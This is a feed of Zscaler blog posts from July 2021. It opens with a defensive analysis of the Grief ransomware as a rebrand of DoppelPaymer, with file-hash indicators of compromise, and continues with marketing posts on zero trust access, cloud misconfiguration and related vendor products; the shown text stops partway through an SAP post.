Research Blogs Feed Zscaler Blog — News and views from the leading voice in cloud security. en DoppelPaymer Continues to Cause Grief Through Rebranding In early May 2021, DoppelPaymer ransomware activity dropped significantly. Although the DoppelPaymer leak site still remains online, there has not been a new victim post since May 6, 2021. In addition, no victim posts have been updated since the end of June. This lull is likely a reaction to the Colonial Pipeline ransomware attack which occurred on May 7, 2021. However, the apparent break is due to the threat group behind DoppelPaymer rebranding the ransomware under the name Grief (aka Pay OR Grief). An early Grief ransomware (aka Pay or Grief) sample was compiled on May 17, 2021. This sample is particularly interesting because it contains the Grief ransomware code and ransom note, but the link in the ransom note points to the DoppelPaymer ransom portal. This suggests that the malware author may have still been in the process of developing the Grief ransom portal. Ransomware threat groups often rebrand the name of the malware as a diversion. In this blog, we will compare the similarities between DoppelPaymer and Grief ransomware. Both ransomware leak sites are nearly identical, including shared code that displays a captcha to prevent automated crawling as shown in Figure 1. Figure 1. Grief ransomware (left) and DoppelPaymer (right) captcha The main landing page has changed the term latest proofs to griefs in progress and latest leaks to complete griefs. The victim-specific leak page layouts are also identical as shown below in Figure 2 containing the victims URL, organizational description, images of stolen data, example stolen data files, and a list of machines that were compromised. Figure 2. Grief ransomware (left) and DoppelPaymer (right) victim leak pages The Grief ransom portal has some differences from the DoppelPaymer portal. In particular, the ransom demand payment method is made in Monero (XMR) instead of Bitcoin (BTC). This switch in cryptocurrencies may be in response to the FBI recovering part of the Colonial Pipeline ransom payment. The Grief ransom portal, however, kept the same live chat code that allows victims to resume a previous conversation or to start a new conversation as shown in Figure 3. Figure 3. Grief ransomware (left) and DoppelPaymer (right) victim ransom portals Grief ransomware portal and leak site also attempts to weaponize the European Union’s General Data Protection Regulation (GDPR) to pressure businesses into paying a ransom to avoid potential fines. The malware code differences between DoppelPaymer and Grief are also relatively minimal. Grief samples removed the embedded ProcessHacker binaries. However, Grief still retains the code to decrypt data from the binary’s .sdata section. The Grief string encryption algorithm is similar to DoppelPaymer, except the RC4 key was increased from a length of 40 bytes to 48 bytes. The vast majority of the two codebases are very similar with identical encryption algorithms (2048-bit RSA and 256-bit AES), import hashing, and entry point offset calculation. Conclusion Grief ransomware is the latest version of DoppelPaymer ransomware with minor code changes and a new cosmetic theme. The threat group has been very active since the release of Grief in the middle of May 2021. However, they have been successful in maintaining a low profile so far. This is in light of recent high-profile attacks including the Colonial Pipeline hack by Darkside ransomware and the Kaseya supply-chain attack by REvil. Indicators of Compromise (IOCs) The following IOCs can be used to detect Grief ransomware. Samples SHA256 Hash Module Name b5c188e82a1dad02f71fcb40783cd8b910ba886acee12f7f74c73ed310709cd2 Grief ransomware sample 91e310cf795dabd8c51d1061ac78662c5bf4cfd277c732385a82f181e8c29556 Grief ransomware sample dda4598f29a033d2ec4f89f4ae687e12b927272462d25ca1b8dec4dc0acb1bec Grief ransomware sample 0864575d4f487e52a1479c61c2c4ad16742d92e16d0c10f5ed2b40506bbc6ca0 Grief ransomware sample b21ad8622623ce4bcdbf8c5794ef93e2fb6c46cd202d70dbeb088ea6ca4ff9c8 Grief ransomware sample (early build) Wed, 28 Jul 2021 11:40:06 -0700 Brett Stone-Gross Five Ways Banks Can Make the Most of Hybrid Infrastructures To thrive in a fast-changing economic landscape, the finance sector has had to reinvent itself by embracing cloud and mobile computing. Even though financial organisations have made significant progress toward digital transformation, the adoption of new technologies is often overlayed on legacy IT infrastructure. This is holding the financial industry back from reaping the benefits of their digitalisation efforts. How can financial institutions manage to succeed in a polarised world of legacy infrastructures and modern cloud-based applications? The banking industry is changing rapidly Advances in technology have opened the market to disruptive digital competitors. The rise of so-called challenger banks has developed in line with consumers’ readiness to embrace e-commerce through smartphones and e-payments. This market dynamism means that customers have become more demanding and expect real-time, customized, and seamless experiences in their daily interactions with their banks. Digital innovation and business agility are key for financial institutions to not only maintain their existing customer base, but also to attract new customers, grow market share, and address growth opportunities in new market segments. Despite the need to maintain strict compliance with financial regulations and governance controls, the finance sector is evolving fast, and digital transformation is well underway. To mitigate the risk of losing customers, financial organisations are faced with the challenge of attempting to replicate the level of in-person customer service that they used to deliver in their branches with similarly outstanding digital experiences. This is a core reason that user experience is a top business priority for most financial organisations, not only for their customers but also their employees. Cloud apps do not equal a cloud-ready infrastructure The challenge for financial organisations is that, although they want to adopt new IT solutions to enable transformation, they have to abide by strict policies to meet the requirements of their regulators. As such, they’re risk-averse, and tend to stick with their legacy IT infrastructure. Their reluctance to interfere with their core banking-related IT systems, many of which have been in place for 30+ years, leads to a hybrid setup of their IT. While there are various reasons why it is difficult to implement changes in legacy architectures, the financial industry, like many other industries, is still modernising its user-oriented front ends. However, unlike other industries, banks are struggling to live in the hybrid cloud and on-premises environments, for the same regulatory reasons that are holding them back from fundamentally modernising. They have to be compliant with the policies and regulatory requirements of their data flows and at the same time have to balance security and user experience for their new cloud-based initiatives. While financial organisations are embracing mobile and cloud technology to foster company-wide digital transformation, they still have to consider the security of the data flows that are leaving their boundaries. With the transition to cloud-based applications, they must manage the enablement of their workforce without compromising security by using the internet as a path to access apps. For financial institutions to maximise the full potential of the cloud in their hybrid infrastructures, while still maintaining the utmost security, they’d be wise to consider the following five key steps. 1: Consider the user experience Banks traditionally had central headquarters supported by branch offices. In traditional “hub-and-spoke” networking environments, all these locations connect to a single corporate network and link to a central private data centre. In this setup, all data is routed back into the data centre via expensive MPLS backhaul links. This all worked fine when desktop apps all lived on-premises, but no longer functions when applications have moved to the cloud. The detour from each user via the corporate network to break out to cloud-based applications adds latency and therefore harms the user experience. For example, Office 365 is a common application that lives in the cloud, and its adoption creates a surge in cloud-bound data traffic that requires a huge amount of bandwidth. In a legacy environment, data traffic flows from the branch offices to the data centre over MPLS networks, then outbound through the data centre security stack to Microsoft clouds hosting Office 365. It then must double back through the inbound security stack back into the data centre, then back out to branch offices. This multi-hop, multi-security-check route introduces huge amounts of latency and hinders Office 365 performance. Financial institutions need to provide staff seamless access to their cloud-based applications. They can overcome the latency challenge by giving staff direct connectivity to the internet and their cloud-based applications. 2: Provide secure access from anywhere The banking sector’s journey to the cloud was halted abruptly due to the COVID-19 pandemic. Within a matter of days, thousands of office- and branch-based staff were required to work remotely. Unfortunately, this transition was not as seamless as one might have hoped, due to organisations’ existing “hub & spoke” infrastructures. Ultimately, remote workers were sending data on an even more convoluted journey to access their applications. Going back to the Office 365 example: traffic originates from a VPN client and flows into and out of the data centre via a linear stack of appliances including load balancer, distributed denial of service (DDOS) security, firewall, VPN concentrator, intrusion prevention system (IPS), SSL, data loss prevention (DLP), and/or advanced threat protection (ATP). Again, the inherent latency in the traffic route means that Office 365 performance decreases, often to the frustration of the user. They might even feel tempted to bypass VPN controls, which could open the corporate network to attack. Relying on VPN for remote connectivity may be a proven method, but unfortunately, the VPN was invented before the age of the cloud and therefore no longer provides the most efficient route, but rather acts as a performance killer. A VPN connection not only slows down traffic but opens the whole network for the user and application, therefore potentially leading to security issues. Banks should start looking to free themselves from VPNs and look to more modern approaches which provide a higher amount of security and prohibit network access to unattended users. Establishing and maintaining secure remote connections to cloud applications does not need to be a performance killer nor an attack vector. A zero trust-based solution can enable granular, direct, and secure user-to-application access and can be implemented on top of legacy infrastructures. 3: Combine cost and complexity savings with heightened security An additional point to review in hybrid setups is the Virtual Desktop Infrastructure (VDI), which has been broadly adopted in the financial sector for security and data residency restriction. Instead of accessing the application directly, virtualisation enables the visualisation of information on-screen, without the ability to change or extract data, as the application is still running on the server and hence does not leave the corporate boundary. VDI technology enables remote users to connect to core systems, email, and other applications via bring your own device (BYOD), mitigating classic issues such as data exposure and theft. However, desktop virtualisation is a complex undertaking, and performance of the virtual desktop can again prove an issue for the user, as the transmission of the virtual image is relying on network connectivity. The remote access path once more needs to involve a VPN to allow VDI access and only in the last step provides the app view. Furthermore, these solutions are not only notoriously difficult to set up and costly to maintain, but are over-used and add an additional security risk, particularly during the pandemic. Financial organisations must be careful not to remedy an underperforming network with additional infrastructure. This not only adds further complexity and cost but also increases risks. As organisations travel further down the path of building upon their legacy infrastructure, they become less agile, innovative, and competitive. This is the exact opposite of the ultimate aim of their digitalisation journey. Reconsider the costly and complex setup of a VDI infrastructure. Complementing it with a cloud-based security approach can help to control what the user has access to and adds centralised visibility and control next to a faster and consistent user experience. 4: Direct-to-cloud access versus mobile “appification” and BYOD Banks have traditionally relied on fat clients and desktop systems in their offices, which provide a completely different touch and feel than what staff are used to from their personal devices when used for private browsing and social media interaction. To provide the same experience, banks are considering allowing BYOD. CIOs in banking and financial services increasingly manage projects that extend primary business functions such as core banking systems (CBS) to mobile workers through app extensions as a means to survive in the modern banking world. Because financial institutions can’t give direct access to legacy infrastructures, they invest heavily into mobile apps to get work done from the field as a workaround in some parts of the world. The appification of these core banking functions aims to provide field employees with a simple, speedy, and secure method of helping customers make decisions and engage in services remotely. To provide and collect the best information for quotes, policies, coverage details, terms and conditions, and other data, field staff need access to core banking and insurance systems. One solution to the remote access challenge is creating mobile apps for loan origination and policy quote engines, packaging them inside a mobile device manager (MDM) container and using real-time web services or APIs that connect to core systems. But appification creates new headaches for IT leads, like the need for increased development overhead, frequent change requests, or higher demand for end-user requests. Such an approach adds complexity to the overall IT environment. Instead of building mobile apps, IT teams should be looking for more effective ways to give field staff secure access to core business functionality through the cloud. Ubiquitous mobile broadband access, increasing cellular speeds over LTE (now moving to 5G), and public Wi-Fi hotspots facilitate remote work from anywhere. Allowing employees access to CBS applications from the field with the same ease of access as from headquarters or a branch office means there is no need for mobile-app extensions but for secure BYOD. 5: Audit support through visibility Financial institutions always need to think about upcoming audits and other regulatory requirements. An internal IT audit challenges the organisation’s ability to understand its risk exposure and analyses the efficiency of an organisation to detect and report data breaches. Additionally, an organisation needs to understand whether they have appropriate measurements in place to cope with these risks. As financial organisations seek new methods of creating value, address new target groups, and keep track with the change of digitalisation, they still need to ensure they have insight into all data streams in response to audits. CIOs should always know who is in the network, and what they have access to. IT decision-makers need to anticipate what supervisory developments mean for their organisation and make decisions based on these, as well as their own threat analysis and cyber programmes. The most important parameter is therefore the visibility into all employees’ on- and off-network traffic, regardless where they are working and which device they are using to access their applications. With the rise of cloud and mobility, financial institutions face the challenge of keeping track of all data flows within their organisations‘ range. They need a single pane of glass to regain visibility into that traffic, and the cloud can be a key enabler. To fulfill the requirement of an internal IT audit and for visibility into all data streams in the fight against cybercrime, a highly integrated cloud security platform reduces the complexity of tasks and facilitates auditing processes. Zero trust helps to overcome limitations of legacy infrastructures A zero trust architecture typically employs a cloud security model to support fundamental principles of default-deny posture and follow-the-user policy controls. In this way, zero trust extends security protection to mobile devices so that remote staff can access core applications with the same level of security controls as staff based in the office. Users are never placed on the network, and instead connect only to applications as allowed by configured business policies. This contrasts with traditional VPN access, which tenuously extends the corporate network beyond the limits of its effective control. Additionally, users and devices are authenticated first before access to an application is granted. As each user is directed to an application, regardless of whether it resides in the data centre or in the cloud, zero trust enables the fastest connection between the user location and application-hosted location. There is no longer a need for backhauling through the corporate security structure, thereby considerably improving application performance and user experience. Digitalisation efforts are well underway in the financial industry. However, to gain maximum benefit from the cloud, financial institutions can do more than just implementing cloud-based front-end apps. Zero trust enables them to overcome limitations of their legacy infrastructures, as this security approach adds performance, security, and user experience to cloud-based apps. Wed, 28 Jul 2021 08:00:01 -0700 Sudip Banerjee National Cybersecurity Center of Excellence (NCCoE) Selects Zscaler as Technology Collaborator for Implementing a Zero Trust Architecture Project Strengthening the nation’s cybersecurity requires more — and better — collaboration between the public and private sectors. That’s why we are honored to announce that the National Institute of Standards and Technology (NIST)’s National Cybersecurity Center of Excellence (NCCoE) has selected Zscaler as one of its partners in a new Zero Trust Architecture Project. Zscaler will work alongside the NCCoE and other top Federal IT vendors on different approaches for implementing zero trust architectures. “We received an overwhelming response from the vendor community on this important project,” said Natalia Martin, acting director of the NCCoE, in the announcement. “Implementing a zero trust architecture has become a Federal cybersecurity mandate and a business imperative.” Top industry leaders will come together to demonstrate various approaches to implementing a zero trust architecture. These approaches will use a diverse mix of products and capabilities — and the effort will provide valuable "how to" guidance and lessons learned. As Federal employees continue to work from anywhere, and more and more applications move from inside the data center to outside the network perimeter, network and security teams are shifting their focus from securing the network to protecting users, devices, and business resources. As we like to say at Zscaler, zero trust is a team sport — and the NIST NCCoE is taking the initiative to bring together best-of-breed zero trust leaders. We’re committed to collaborating with customers and partners to demonstrate different, practical approaches to implement a zero trust architecture. As we know, no one solution fits every situation. Zscaler is honored to be a part of this coalition working side by side to realize the opportunity for zero trust to strengthen every agency’s cyber defenses. For more information, see NCCoE’s press release, here. Tue, 27 Jul 2021 07:00:02 -0700 Stephen Kovac Seeing the Invisible: Network Monitoring in a Zero Trust World Application transformation has upended traditional monitoring approaches: applications reside in SaaS, infrastructure gets deployed in public clouds, and users (employees, partners, and customers) access assets from mobile devices well-outside the corporate domain. Business no longer takes place on a trusted corporate network or inside a well-defined security perimeter. The legacy hub-and-spoke network with a castle-and-moat security model that worked well during the pre-cloud and pre-mobile world does not work anymore. Cloud security using Zscaler’s Zero Trust Exchange makes the internet a safe place to do business by securely connecting any user, device, and application—regardless of eithers’ location. The Zero Trust Exchange is a modern approach that enables fast and secure connections to corporate applications, assets, and data using the internet as the corporate network. People can connect from anywhere, using any device, and maintain the same level of security and data protection. The zero trust principle of least-privileged access provides comprehensive security using context-based identity and policy enforcement. Traditional firewalls advertise connections to your applications through your network security perimeter directory to the internet. But bad actors can also discover these same network “holes.” VPNs put remote users onto the network, where a single breach can laterally compromise the rest of the networks and systems behind the secure login. Both expand your attack surface. The Zero Trust Exchange makes apps invisible and only accessible to authorized users. The network ceases to have holes because it isn’t a defense wall. Zero trust creates a zero attack surface. Historically, diagnosing application and network problems for remote users accessing internal applications has always been a challenge due to the lack of monitoring data. In VPN environments, network paths within the VPN tunnel are always encapsulated and hidden from view. Good luck finding that wireless latency issue or the gateway that is dropping packets! At first glance, it would seem that moving to a zero trust architecture would make this problem worse: now, internal applications are hidden entirely from the network. Traditional network path analysis techniques like traceroute and ping no longer work. What can you traceroute or pingto when the application is no longer visible on the network? Enter Zscaler Digital Experience (ZDX). ZDX provides a unique monitoring overlay for the Zero Trust Exchange and provides deep visibility into the performance of both public and private applications. ZDX’s recent integration with Zscaler Private Access (ZPA) makes it possible to understand user experience from an application and network perspective. ZDX provides application performance statistics for every employee every few minutes and combines that with network path analytics to the ZPA Service Edge (with complete end-to-end path visibility coming soon) using CloudPath (see Figure 1). Figure 1: ZDX exposing hop-by-hop network details for an internal application protected by ZPA CloudPath leverages Zscaler’s integrated Client Connector agent to measure hop-by-hop network performance every few minutes, identifying places where latency and packet loss might be affecting application performance. CloudPath makes use of ZDX’s unique 360-degree monitoring (see my recent blog here), where path analysis is not only from the client endpoint outbound but instead takes advantage of the Zero Trust Exchange to view network path from the internet inbound. This visibility exposes performance problems caused by server delays, DNS resolution times, weak Wi-Fi, local ISP latency, internet backbone issues, and more. Everything that used to be hidden with traditional VPN environments can now be monitored and measured. Replacing your legacy VPN with a zero trust model always had a massive security benefit. Who knew that there was also an enormous benefit for IT operations as well? Tue, 27 Jul 2021 08:00:01 -0700 Sanjit Ganguli Winning Over the Boardroom By Enabling the Business Ecosystem As if managing a constantly changing mix of remote and office workers wasn't messy enough, third-party risk is among the biggest security issues boardrooms are facing following high-profile supply chain failures like the 2020 SolarWinds cyberattack, which showed how a small, isolated risk can cascade into a systemic risk threatening the bigger supply chain ecosystem. Companies have a lot riding on third-party ecosystems. They can shake up your supply chain and tap into potentially huge pools of value by landing new customers, improving operations by reducing production and delivery times, and delighting your customers with a great experience. As business ecosystems become more complex and geographically dispersed, IT leaders are expected to provide expertise to boards of directors regarding the digital risks posed by third-party relationships. So, how concerned should you be about third-party digital risk? In short—very concerned. Third-party risks in the digital world Gartner research shows that more than eight out of ten companies discover third-party risks after conducting due diligence, with over 31 percent of those risks having a material impact on the business. Broadly speaking, a third party is an external entity that your company does business with. This can include service providers, suppliers, vendors, contract manufacturers, distributors, resellers, and auditors, to name a few. It has been a core function of IT to protect company operations and keep the bad guys out of internal networks with firewalls and virtual private networks (VPNs). With the acceleration of digital transformation, however, it is often necessary to give third-party users access to the organization's most sensitive data. This means making B2B applications and services available to their external supply chain and customers over the internet. A whopping 82 percent of companies give third parties access to all of their cloud-based data. The problem is that you have little insight into your partner's security protocols or the devices they use to connect to your IT and industrial networks. Misplaced trust in third parties creates security headaches for the board and IT VPN is one of the traditional methods of connecting third parties to backend systems. A VPN places users directly on the network with full network IP access, allowing them to explore and discover (and potentially snoop on) your private applications and data. This approach has two problems. Let's start with the user experience. VPN entails forcing the user into a single entry point only to backhaul them somewhere else to be inspected, like a centralized data center or public cloud provider. In other words, you are sending the user over a circuitous route to conduct a traffic security check and thereby slowing down their internet connection. The expanded attack surface is the other challenge. VPNs are built with an inbound VPN gateway that sits at the edge of the network and listens for inbound pings to confirm reachability. Clustering and load balancing these stacks across multiple ingress points is also necessary to guarantee high availability. If you have this kind of architecture, not only do you have to deal with the listening port on the network, but you also have to deal with the attack surfaces of everything the third-party user can touch and potentially expose to attackers. Managing third-party security risks to create and protect value Third-party users are often unaware of the implications and dangers of having over-privileged access, which can put your entire system and operations at risk. It's time to replace this traditional method of connecting third parties with the network since it no longer works in a world where data and apps are distributed. With a continuous, iterative approach that embodies the principles of zero trust, you can effectively manage your third-party risks: Secure application connectivity without network access. Never place third-party users directly on your network. Eliminate over-privileged access to critical applications, data, and systems. Minimize the external and internal attack surface. Assess your attackable surface with our internet attack surface analysis tool. Minimize risk with application microsegmentation. Enable policy-based access no matter where the user is going or coming from. Create a zero trust, segment-of-one connection between the partner and the resource they need to get to. Monitor suspicious activity. Assume no user or device is trustworthy and will be breached. Keep track of every resource a user touches. Continuously verify they are who they say they are and they are doing only what is necessary for their role. Four questions you should ask about third-party risk By overcoming the pandemic-induced stress tests on business operations, IT leaders stepped onto a much bigger stage, extending their influence and role within their companies. With this comes the opportunity to speed up digital transformation for your business ecosystem and add lasting value. So, how can you ensure partners stay productive while staying vigilant against attacks on your company? Here are four questions you should be asking your teams to assess your third-party risks: How quickly can a vendor or partner get access to our systems today? Who are the third-party users that need access to our data, applications, and other sensitive info, and what would happen if they were compromised? What is our approach to granting access to our systems during the different phases of the third-party lifecycle: pre-contract due diligence, contracting, onboarding, monitoring, and termination? Is third-party access to the network really necessary? Zero trust makes collaborating with partners simple and safe The Zscaler Zero Trust Exchange is a modern approach that enables fast, secure connections and allows your partners to collaborate with you from anywhere. Based on the zero trust principle of least-privileged access, it provides comprehensive security using context-based identity and policy enforcement. Zscaler has one big advantage in solving the problem of secure third-party access. Our Zero Trust Exchange runs across 150 data centers worldwide, ensuring that the service is close to your external users, co-located with the cloud providers and applications they are accessing. It guarantees the shortest path between your users and their destinations, providing them with an amazing user experience. With Zscaler, you can reduce costs by eliminating expensive VPNs, reduce risks by eliminating attack vectors targeted by bad actors, and empower your business to collaborate productively with external partners. It’s time to take your business ecosystem to the next level by managing third-party risk with zero trust network access for your private apps. Let us help you take the next steps on your transformation journey. Read the solution brief: Zscaler Private Access for Secure Third-Party Access Take a test drive: Zscaler Private Access Interactive Fri, 23 Jul 2021 10:11:04 -0700 Linda Park Zero Trust: Security from the Cloud Data safety and data security are the cause of continuous stress for IT departments in pharmaceutical companies. Intellectual property such as research results, manufacturing processes, formulae, and even patient details have become attractive targets for cybercriminals. Networking with third parties and remote work-from-home users due to the pandemic are putting security officers to the test. Thanks to the SASE framework and the zero trust security architecture, these worries can be relegated to the past. Digital transformation has already reached the pharmaceutical sector. However, IT infrastructures at pharmaceutical companies, especially the network environments that are critical to business, are often not prepared for an increasing number of remote access requests from home offices. Virtual Private Networks (VPNs) are commonly used for this. The problem is that this technology, developed by Microsoft in the 90s, was not designed to manage an increasing number of remote access requests, which results in latency and creates security issues. For some time now, VPN has been losing its reputation for being invulnerable. For example, unpatched remote access VPN servers enable cybercriminals to easily access a company’s network, meaning the same technology that is supposed to protect the network is vulnerable to attack. In addition, companies must strive to implement segmentation. Juicy prey – the healthcare sector This is a huge concern because cybercriminals are increasingly targeting the business side of the pharmaceutical industry, as clearly stated in the Zscaler study "2020 State of Encryption Report." The Zscaler cloud identified and prevented 6.6 billion threats between January 2020 and September 2020. The healthcare sector was in first place with nearly 1.7 billion attacks discovered and prevented. A particularly precarious issue was that the attacks were hidden in SSL traffic, namely, encrypted data traffic. In total, the number of SSL-based attacks in the period researched increased by 260 percent, according to another conclusion of the study. The fact that the healthcare sector is particularly attractive to cybercriminals is no surprise. Besides new work strategies with home office regulations and bring your own device (BYOD) policies, obsolete and inadequate security mechanisms in system environments — combined with the increasingly perfidious methods of data thieves — continue to cause anxiety for IT security officers. In addition, cooperation between third parties — universities, partners, or suppliers — which is typical within the pharmaceutical industry, results in them having full access to parts of the network. These over-privileged users create a major risk, as the monitoring of devices and guidelines occur outside the area of control of the IT administrator. In practical terms, IT officers lack oversight of the access rights of external users to individual applications and services. For this reason, the attack surface area is exponentially larger. Ultimately, the ever-present trend of mergers and acquisitions in this industry means that network structures and their security measures are often not up to current technology standards - independent of the fact that the integration of various IT topologies can take months or even years. M&As bring about increased security risk — already established infrastructures need to be dismantled and reintegrated within the context of merging organisations and configuring a new network. In addition, there is the typical problem of what is known as shadow IT, which exists alongside the official IT infrastructure and without the knowledge of the IT department. Read more about this in a recent blog to find out how Zscaler can help you to accelerate M&A processes. SASE and zero trust: a safe haven for the pharmaceutical sector For pharmaceutical companies, the Gartner Model SASE (Secure Access Service Edge) and ZTNA (Zero Trust Network Access) are a safe haven from these challenges — moving employee security and connectivity to the cloud. Simultaneously, productivity will increase, because employees can avoid the detour through a VPN and the server centre and use innovative solutions such as Microsoft 365 in an effective and secure manner. Zscaler’s ZTNA solutions make it possible to uncouple application access from network access, segment individual user access to the application, and provide both remote access to server centres and applications in hybrid and multicloud environments. In other words, the merging of networks can be considered something of the past, because zero trust eliminates the need to place users on the network. Employees, as well as third-party companies and contractors, are only given secure, granular, and exclusive access to the specific applications. Therefore, instead of relying on physical or virtual appliances, Zscaler Private Access (ZPA) enables the use of a cloud-based solution. Based on a set of defined policies, the Zscaler Zero Trust Exchange seamlessly connects various users to specific applications by using inside-out connections. This results in fast and high-performance user connectivity to business-critical applications and continuous security for sensitive data. This enables companies to kill several birds with one stone: set up professional defence mechanisms to fend off cybercriminals, while employees and external users can access the information they need using a protected corridor. Moreover, mergers and acquisitions aren’t automatically stressful to IT officers. Wed, 21 Jul 2021 09:14:39 -0700 Kevin Schwarz Prevent Cloud Security Breaches Attributable to Cloud Misconfigurations with CSPM Public cloud adoption enables enterprises across all sectors to collaborate more efficiently, especially in today’s highly remote business environment. The cloud offers many advantages: faster deployments, increased agility and resilience, lower risk, auto-scalability, and cost-effectiveness for enterprises of all sizes. The use of public clouds is growing, and so are the attacks targeting them. But that doesn’t mean public clouds are risky or that organizations should stay away from them. While even public cloud infrastructure is now far more secure, data in the cloud is still vulnerable due to a significant challenge: misconfiguration. High-profile data breach incidents have shown that the cause of most successful cyberattacks on public cloud instances is due to misconfigurations rather than vulnerabilities. Therefore, adequately configuring systems is critical for reducing the chance of a breach. Why misconfiguration is the top cloud vulnerability Cloud providers are continuously introducing new features and functionalities to their services, which is exciting and promising. At the same time, however, these changes add complexities to cloud environments that make it harder to protect against misconfigurations and compliance risks and keep data secure. While CSPs often provide tools to help manage cloud configuration, misconfiguration of cloud resources remains the most prevalent cloud vulnerability that the bad actors can exploit to access cloud data and services. Often arising from cloud service policy mistakes or a misunderstanding of shared responsibility, misconfiguration has an impact that varies from denial-of-service susceptibility to account compromise. The impact of cloud misconfigurations Misconfigurations create entry points for hackers. It can only take a few minutes for a system to be compromised. However, many organizations still take days, months, or longer to realize that an intruder has accessed their data, and then they start taking corrective action. Cloud misconfiguration errors related to public access to storage buckets, account permissions, password storage and management, unencrypted data stores, etc., have led to numerous data breaches and the exposure of billions of records. Victims included high-profile companies such as Capital One, Facebook, Ford, and Netflix. There are countless examples of cloud misconfiguration–related data breaches, but one worth mentioning occurred in 2018 when FedEx unknowingly exposed thousands of scanned documents due to the company’s failure to secure an Amazon Web Services (AWS) cloud storage server. The breached documents included passports, drivers’ licenses, and applications for delivery of mail forms that contained customers’ names, home addresses, phone numbers, and zip codes. The causes of cloud misconfiguration that can lead to data breaches According to Gartner, nearly all successful attacks on cloud services result from customer misconfiguration, mismanagement, and mistakes. As more organizations store data in the cloud, cases of cloud configuration errors are bound to increase. Cloud misconfiguration is most frequently caused by: Lack of understanding of the shared responsibility model: Cloud security and compliance are shared responsibilities between the cloud service provider (CSP) and the customer. The CSPs provide the security “of” the cloud service and infrastructure, and the security “in” the cloud service is the customer’s responsibility. In all cases, it is the enterprise’s responsibility to ensure that its data is adequately protected. CSPs are responsible for detecting threats, updating, patching, and incident response to the cloud infrastructure. The enterprises are responsible for detecting, responding to, updating, and patching their cloud assets and resources. Understanding the shared responsibility model and the proper configuration of the account can help enterprises align and implement compliance and security policies as per their industry domain. Lack of visibility and control: If you can’t see the data in the public cloud, you can’t secure it. It is essential to accurately discover and track assets and inventory with complete context, configuration status, and weak spots. Potential risk areas include databases with ports open to the public internet that could allow attackers to access cloud storage services set to public. While it might take some time and effort for the IT and security teams to have visibility into all assets and resources, it is necessary for securing the platform. Poor access and permission management: Access management is one of the most common security risks. Incorrect access management configuration often leads to over-privileged users gaining access to sensitive data. Extensive access permissions to IAM users, groups, and cloud services is a risky practice. If such credentials get compromised, cybercriminals may access any services and data, expose assets, and compromise data. In a notable example, poor access management at Uber leaked the personally identifiable information (PII) of 57 million users. Misconfigurations in network security groups: Misconfigured network security groups allow attackers to abuse the exposed services and ports to make their way into the cloud-based systems through a brute-force attack or by exploiting known vulnerabilities. It is the second most widely reported security risk after storage bucket misconfiguration. Human errors: Human error is the most common cause of misconfiguration due to complex and multiple levels of configuration. In the absence of automation, cloud workloads and cloud security services are manually configured, increasing the chance of human error. Relying on a CSP’s default configurations can also cause problems and lead to increased security risk. Lack of adherence to compliance regulations and controls: Compliance with standards such as PCI-DSS or SOC communicates an organization’s commitment to doing business the right way and aligning with globally accepted security benchmarks. In many cases, companies may achieve compliance once but find it challenging to manage in the long run, which can lead to financial loss and damage to the company’s reputation. Lack of encryption: The “Public mode” setting to databases, shared storage, and other cloud provider services is a significant cause of data breaches. It allows cybercriminals to automate their searches for weak security points. The most common misconfigurations still revolve around cloud storage buckets and the objects that are not encrypted, which pose a significant confidentiality risk and make them the number-one target for data breaches. CI/CD pipelines: With the rapid-release cycles employed by development and DevOps teams, the security and risk management teams struggle to keep up with the changes and gain control over these deployments. The CI/CD pipeline can contain vulnerabilities that have the potential to compromise all systems. Most vulnerabilities relate to configuration or management. A significant portion of security and risk concerns can be addressed during the design and development phase. Log monitoring disabled: Security incidents and event logs are critical to determine security failures. In case of a compromise, logs are often the first source of information. CSP tools, such as AWS CloudTrail and Azure Monitor, can help ensure that you have security incidents event logs. But they only work when enabled. Delayed incident response: Serious misconfigurations often go undetected for days or weeks, and it can be very challenging to secure cloud services and applications. Compared to periodic assessments, real-time alerts and notifications help enterprises identify incidents proactively, so they can measure and mitigate violations and risks to critical infrastructure, systems, and data on an ongoing basis. How can you prevent cloud misconfigurations? Now that you have a better idea of the common causes of cloud misconfiguration that can lead to security breaches, here are some tips that can help you avoid them. Gain visibility and control Know your cloud environments and define a security foundation. Continuously monitor cloud assets and resources for current configuration status. Audit access and permission Review access controls to ensure only authorized users can act. Ensure the IAM policies are correctly implemented, such as bucket policies on storage accounts inside of CSPs. Enforce the principle of least privilege by only giving users the permissions they need to do their jobs. Consider setting up multifactor authentication for credentials to provide an extra layer of security. Access keys can be helpful with periodic rotation. Log monitoring Implement logging, which can identify changes to cloud environments and help determine the cause and extent of misconfiguration incidents. A dedicated team should monitor logs regularly, as they are a crucial part of incident response. Enable encryption and backup Conduct frequent assessments and audits of storage bucket configuration settings and access policies. Encryption, uniform access, and backup of the contents within storage buckets will help to minimize the damage if an incident occurs. Automate incident response, policy enforcement, and remediation Automation eliminates human error and delays caused by workforce bottlenecks. Configure custom/automated alerts and notifications that promptly notify cloud admins and users about misconfigurations with robust remediation. Enforce compliance standards with the right tools and processes that can help organizations benchmark against multiple compliance frameworks, such as PCI DSS for retail and HIPAA for healthcare, and established best security practices with the help of cloud-specific benchmarks like Center for Internet Security (CIS). Embrace a culture of security and DevOps. Define and integrate strong security policies into all processes used to build or enhance cloud infrastructure. According to Gartner, 99 percent of cloud security issues over the next several years will be the fault of customers, not cloud services. Cybercriminals are constantly inventing new ways to penetrate the defenses of modern enterprises. Security controls such as Zscaler CSPM offer you the best chance of preventing, detecting, and remediating potential breaches due to misconfiguration and staying compliant. Want to hear more about Zscaler Cloud Security Posture Management? Get in touch with us today. Additional reading: What is Cloud Security Posture Management White paper: Overcome the Top Five Data Protection Challenges in a Cloud-First World Zscaler CSPM At a Glance (PDF) Tue, 20 Jul 2021 08:00:01 -0700 Mahesh Nawale SAP and ZPA: A Match Made in Digital Transformation Heaven Zscaler is thrilled to team up with SAP to increase global user accessibility to critical business applications while stamping out ransomware attacks and other threats. With the rise of digital transformation initiatives, application owners are moving apps critical to operational and payment functions, such as SAP, to the cloud in order to ensure effective scalability. But, to maximize the value of these cloud investments, achieve business continuity in the event of the unknown (COVID-19, for example), and support a new hybrid work model in the post-COVID world, employees, partners, and customers must be able to securely access SAP and other business apps from anywhere and on any device, and without adding risk to the business. Let’s take a look at the issues in detail. Six challenges IT and application owners must overcome Providing controlled access to SAP instances running in the data center or being migrated to the cloud is a challenge with legacy technology, which involves multiple point products. This leads to more complexity, cost, and friction, reducing ROI from cloud initiatives. Employees, contractors, and partners are constantly on the move and working from a variety of locations and devices. Business continuity requires access to services with an unprecedented level of flexibility that is simply not possible with legacy solutions. The attack surface has expanded due to user mobility and the use of VPNs that extend the network out to the user, 